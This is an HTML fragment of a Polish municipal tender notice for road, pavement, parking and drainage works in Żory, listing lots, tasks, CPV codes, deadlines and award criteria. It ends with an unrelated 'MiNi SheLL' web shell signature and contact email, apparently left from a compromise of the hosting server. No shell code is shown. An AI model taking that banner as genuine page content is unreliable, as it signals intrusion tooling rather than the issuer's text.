- wykonanie nowej nawierzchni z mieszanek mineralno-bitumicznych (warstwa ścieralna z betonu asfaltowego gr. 5cm),
- wykonanie poboczy o nawierzchni z tłucznia kamiennego,
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Zadanie 9  Wykonanie nawierzchni asfaltowej chodnika przy ul. Minimalnej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- cięcie piłą nawierzchni bitumicznej,
- rozbiórka nawierzchni bitumicznej oraz z kostki betonowej, krawężników i obrzeży,
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- przełożenie nawierzchni z kostki betonowej,
- ułożenie krawężników betonowych 30x15x100 na ławie betonowej,
- ułożenie obrzeży betonowych 30x8x100,
- wyrównanie istniejącej podbudowy tłuczniem kamiennym,
- czyszczenie poboczy,
- regulacja pionowa studzienek i włazów kanałowych
- skropienie nawierzchni drogowej asfaltem,
- wykonanie nowej nawierzchni z mieszanek mineralno-bitumicznych (warstwa ścieralna z betonu asfaltowego gr. 4cm na chodniku i 7 cm na jezdni),
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 34.92.21.00-7, 45.11.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji na roboty budowlane (36, 48, 60 miesięcy) - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nawierzchnie z kostki brukowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 Nawierzchnie z kostki brukowej

Zadanie 1 Wykonanie chodnika w Parku Cegielnia
- organizacja placu budowy,
- korytowanie pod nowe nawierzchnie brukowe,
- załadunek i wywóz materiałów z korytowania,
- wykonanie nowej podbudowy tłuczniowej pod nawierzchnie brukowe,
- ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- wykonanie nawierzchni brukowych chodników z kostki brukowej betonowej wibroprasowanej gr. 6cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (trapezowa szara ),
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Zadanie 2 Wykonanie chodników na Skwerze Europejskim 
a) odcinek nr 2
- rozbiórka płyt żelbetowych
- wykonanie korytowania po trasie chodnika
- załadunek i wywóz materiałów z korytowania na wysyp.
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni.
- zabudowa obrzeży betonowych o wym. 30x8 cm,
- wykonanie nawierzchni z kostki brukowej szarej, prostokątnej fazowej 6 cm.
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy i porządkowanie terenu.

b) odcinek nr 4
- rozebranie obrzeży 6x20 cm,
- wykonanie korytowania po trasie chodnika,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni,
- zabudowa obrzeży betonowych o wym. 30x8 cm,
- wykonanie nawierzchni z kostki brukowej szarej, prostokątnej fazowej 6 cm.
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ),
- ręczne plantowanie poboczy i porządkowanie terenu.

c) odcinek nr 5
- rozbiórka płyt żelbetowych,
- wykonanie korytowania po trasie chodnika,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni,
- zabudowa obrzeży betonowych o wym. 30x8 cm,
- wykonanie nawierzchni z kostki brukowej szarej, prostokątnej fazowej 6 cm,
- pełna obsługa geodezyjna (odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy i porządkowanie terenu.

Zadanie 3 Wykonanie nawierzchni drogi ul. Pogodnej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka krawężnika,
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podbudowy,
- zabudowa krawężników najazdowych,
- wykonanie studni i wpustów drogowych kanalizacji deszczowej,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej i deszczowej,
- wykonanie nawierzchni z kostki brukowej starobruk szary, 8cm.
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy, zabudowa płyt ażurowych i porządkowanie terenu.

Zadanie 4 Wykonanie nawierzchni drogi ul. Pięknej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka krawężnika,
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podbudowy,
- zabudowa krawężników najazdowych,
- wykonanie studni i wpustów drogowych kanalizacji deszczowej,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej i deszczowej,
- wykonanie nawierzchni z kostki brukowej starobruk szary, 8cm,
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ),
- ręczne plantowanie poboczy, zabudowa płyt ażurowych i porządkowanie terenu.

Zadanie 5 Wykonanie nawierzchni drogi ul. Kiepury
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka płyt żelbetowych oraz ich zdeponowanie w ZTK Żory ul. Okrężna 5,
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- profilowanie i zagęszczenie podbudowy,
- zabudowa krawężników najazdowych, korytek odwadniających,
- wykonanie studni i wpustów drogowych kanalizacji deszczowej,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej i deszczowej,
- wykonanie nawierzchni z kostki brukowej starobruk szary, 8cm.
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy, zabudowa płyt ażurowych i porządkowanie terenu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 34.92.21.00-7, 45.11.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji na roboty budowlane ( 36, 48, 60 miesięcy) - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Utwardzenie kruszywem tłuczniowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 Utwardzenie kruszywem tłuczniowym 

Zadanie 1 Wykonanie nawierzchni drogi ul. Kominka
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi,
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi o szerokości 5,0 m z kruszywa  gr. 35cm,
- pełna obsługa geodezyjna odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy i porządkowanie terenu.

Zadanie 2 Wykonanie nawierzchni drogi ul. Beskidzkiej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi.
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie).
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi o szerokości 5,0 m.
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy i porządkowanie terenu.

Zadanie 3 Wykonanie nawierzchni drogi ul. Sudeckiej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi.
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie).
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi o szerokości 5,0 m.
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
- ręczne plantowanie poboczy i porządkowanie terenu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.11.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji na roboty budowlane ( 36, 48, 60 miesięcy) - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Utwardzenie i wyrównanie nawierzchni dróg gminnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 4 Utwardzenie i wyrównanie nawierzchni dróg gminnych
Utwardzenie dróg z kruszywa o grubości 35 cm po zagęszczeniu - około 10.000 m2
Zakres robót:
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi.
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie).
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi o szerokości 5,0 m.
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej
- pełna obsługa geodezyjna (odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy).
- ręczne plantowanie poboczy i porządkowanie terenu.

Roboty w ramach części 4 wykonywane będą na każdorazowe zlecenie Zamawiającego, wskazujące zakres robót do wykonania oraz termin i miejsce ich wykonania w zależności od bieżących potrzeb w granicach administracyjnych miasta Żory.
Ostatnie zlecenie zostanie przekazane Wykonawcy nie później niż do 15.10.2016r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.11.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji na roboty budowlane ( 36, 48, 60 miesięcy) - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przebudowa nawierzchni Al. Otto Sterna - etap I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5 Przebudowa nawierzchni Al. Otto Sterna - etap I
Zakres robót elektrycznych:
- przeniesienie istniejących słupów i opraw oświetleniowych w nową lokalizację  5 szt.,
- wymiana istniejących słupów na nowe (SAL-5 z fundamentem ROSA TYCHY) z przeniesieniem istniejących opraw 5szt.                                                                                                            - zabudowa nowych słupów SAL-5 z fundamentem i nowych opraw OPC-1/S 70W z kloszem Auris (ROSA TYCHY)
3szt.                                                                                                            - ułożenie kabla YAKY 4x35 mm2 w wykopie, rurach i słupach 394m,                                                          
- pomiary elektryczne,
- inwentaryzacja geodezyjna.

Zakres robót elektrycznych w obecnym postępowaniu przetargowym obejmuje przebudowę sieci oświetleniowej na odcinku od słupa nr D1 do słupa D10 z zachowaniem zasilania ze słupa D11 - projekt elektryczny rys. nr 1.
Uwaga - ze względu na wykorzystanie w przebudowie sieci istniejących słupów SAL-5 i opraw oświetleniowych OPC-1/S 70W z kloszem Auris (prod. ROSA TYCHY), zamawiający wymaga zastosowania tych samych produktów w przypadku zabudowy nowych materiałów.

Zakres robót drogowych
- rozbiórka istniejącej nawierzchni ciągu pieszego wraz z wysepkami przynależnymi, 
- rozbiórka obrzeży betonowych,
- wywiezienie gruzu wraz z utylizacją materiałów z rozbiórki,
- roboty pomiarowe,
- wykonanie wykopów,
- wywiezienie ziemi z terenu rozbiórki wraz z utylizacją,
- dostawa gruntu wraz z uformowaniem nasypów za obrzeżem, 
- zagęszczenie i profilowanie podłoża pod warstwy konstrukcyjne nawierzchni,
- wykonanie warstw odsączających,
- wykonanie podbudowy z kruszyw łamanych gr. 8cm,
- wykonanie podbudowy z kruszyw łamanych gr. 20cm (poszerzenie nawierzchni),
- dostawa i wykonanie nawierzchni z kostki betonowej gr. 8 cm,
- dostawa i wykonanie nawierzchni z kostki betonowej ażurowej gr. 10 cm, 
- dostawa i ułożenie obrzeży betonowych 30x8 cm na ławie betonowej,
- dostawa i ułożenie krawężników betonowych 15x30 cm na ławie betonowej,
- dostawa i montaż małej architektury,
- demontaż słupów znakowych wraz z tablicami znakowymi,
- dostawa i montaż słupów znakowych wraz z tablicami znakowymi,
- wykonanie oznakowania poziomego na skrzyżowaniach i przejściach dla pieszych,
- wykonanie oznakowania poziomego na jezdni,
- inwentaryzacja powykonawcza,

Zakres robót kanalizacyjnych:
- wykonanie wykopów liniowych, 
- zasypanie wykopów kruszywem, 
- wywiezienie ziemi z terenu rozbiórki wraz z utylizacją,
- dostawa i montaż kanałów z rur pcv  o 200 mm, 
- wykonanie podłoży pod kanały z rur, studzienki i wpusty, 
- wykonanie zabezpieczenia ścian wykopów, 
- dostawa i montaż studni rewizyjnych o 1000 mm, 
- dostawa i montaż wpustów deszczowych o 500 mm, 
- wykonanie szczelnych przejść przez ściany istniejących studni,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9, 34.92.21.00-7, 45.31.11.00-1, 45.31.12.00-2, 45.31.61.00-6, 45.11.00.00-1, 45.23.13.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji na roboty budowlane ( 36, 48, 60 miesięcy) - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przebudowa węzła Obwodnicy Północnej z DK-81 w Żorach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 6  Przebudowa węzła Obwodnicy Północnej z DK-81 w Żorach
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu,
- uzyskanie pozwolenia na usunięcie drzew i krzewów w Urzędzie Marszałkowskim w Katowicach wraz z przygotowaniem wniosku i niezbędnymi załącznikami w tym projektu nasadzeń zastępczych do uzyskania pozwolenia na usunięcie drzew i krzewów,
- wycinka i karczowanie drzew oraz krzewów,
- frezowanie i rozbiórka nawierzchni asfaltobetonowej,
- rozbiórka nawierzchni chodnika z kostki betonowej,
- rozbiórka krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
- rozbiórka ekranów akustycznych przy DK-81,
- rozbiórka barier drogowych,
- przebudowa rowu wzdłuż Obwodnicy Północnej wraz z wylotem kanalizacji deszczowej,
- ściągnięcie warstwy humusu,
- wykonanie wzmocnienia podłoża gruntem stabilizowanym cementem,
- wykonanie, formowanie i zagęszczanie nasypu,
- wykonanie muru oporowego prefabrykowanego z elementów typu L 230x135x100
- ułożenie krawężników 15x30x100 betonowych na ławie betonowej z oporem,
- ułożenie obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- ułożenie korytek betonowych odwadniających 60x45x15,
- wykonanie podbudowy z kruszywa łamanego,
- wykonanie podbudowy z betonu asfaltowego,
- wykonanie w-wy wiążącej z betonu asfaltowego,
- wykonanie nawierzchni z SMA,
- wykonanie chodnika z kostki betonowej (kostka z rozbiórki),
- montaż wpustów deszczowych,
- wykonanie przykanalika z rury PVC O250 odwodnienia wraz z murkiem czołowym betonowym do rowu,
- przebudowa istniejącego oświetlenia (przesunięcie słupów i kabla),
- montaż ekranów akustycznych (słupy i panele istniejące, pale wiercone nowe),
- montaż barier ochronnych (bariery istniejące uzupełnione nowymi),
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- regulacja pionowa studzienek,
- wykonanie oznakowania poziomego i pionowego organizacji ruchu,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża gruntowego,
- wykonanie nasadzenia zastępczego drzew i krzewów w proporcjach 1:1 względem drzew i krzewów usuniętych na podstawie uzyskanego pozwolenia na ich usunięcie (gatunek drzew do nasadzenia: lipa drobnolistna o minimalnej wysokości 400 cm i minimalnym obwodzie pnia 18 cm),
- humusowanie poboczy z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9, 34.92.21.00-7, 45.31.11.00-1, 45.31.12.00-2, 45.31.61.00-6, 45.11.00.00-1, 45.23.30.00-9, 45.23.13.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji na roboty budowlane ( 36, 48, 60 miesięcy) - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Budowa parkingu przy ul. Powstańców w Żorach wraz z odwodnieniem i oświetleniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 7  Budowa parkingu przy ul. Powstańców w Żorach wraz z odwodnieniem i oświetleniem
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu,
- uzyskanie pozwolenia na usunięcie drzew i krzewów w Urzędzie Marszałkowskim w Katowicach wraz z przygotowaniem wniosku i niezbędnymi załącznikami w tym projektu nasadzeń zastępczych do uzyskania pozwolenia na usunięcie drzew i krzewów,
- wycinka i karczowanie drzew oraz krzewów,
- rozbiórka nawierzchni asfaltobetonowej,
- rozbiórka nawierzchni chodnika z kostki betonowej,
- rozbiórka krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
- rozbiórka budynku gospodarczego z cegły,
- ściągnięcie warstwy humusu,
- wyrównanie i zagęszczenie istniejącego nasypu z gruzu,
- wykonanie, formowanie i zagęszczanie nasypu,
- ułożenie krawężników 15x30x100 betonowych na ławie betonowej z oporem,
- ułożenie obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- wykonanie podbudowy z kruszywa łamanego,
- wykonanie nawierzchni z kostki betonowej Starobruk gr. 8 cm,
- montaż wpustów deszczowych,
- montaż studni zbiorczych,
- wykonanie przykanalików z rury PVC O200,
- wykonanie kolektora z rury PVC O315 z podłączeniem do istniejącej kanalizacji deszczowej,
- budowa oświetlenia (przesunięcie słupa oraz zabudowanie nowych słupów wraz z wysięgnikami, oprawami i ułożeniem kabla),
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża gruntowego,
- wykonanie nasadzenia zastępczego drzew i krzewów w proporcjach 1:1 względem drzew i krzewów usuniętych na podstawie uzyskanego pozwolenia na ich usunięcie (gatunek drzew do nasadzenia: lipa drobnolistna o minimalnej wysokości 400 cm i minimalnym obwodzie pnia 18 cm),
- humusowanie poboczy z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9, 34.92.21.00-7, 45.31.11.00-1, 45.31.12.00-2, 45.31.61.00-6, 45.11.00.00-1, 45.23.13.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji na roboty budowlane ( 36, 48, 60 miesięcy) - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com